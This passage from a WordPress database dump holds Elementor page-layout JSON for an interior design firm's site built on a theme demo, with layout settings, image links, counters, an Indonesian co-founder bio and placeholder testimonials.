FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"0822 9777 5589\",\"phone_address\":\"082297775589\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3908,4876,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3909,4876,'_elementor_pro_version','3.8.1'),(3910,4877,'_wp_page_template','elementor_header_footer'),(3911,4877,'_elementor_edit_mode','builder'),(3912,4877,'_elementor_template_type','wp-page'),(3913,4877,'_elementor_version','3.8.1'),(3914,4877,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"John Alan\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.<\\/p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/john_allan.jpg\",\"id\":4839,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our 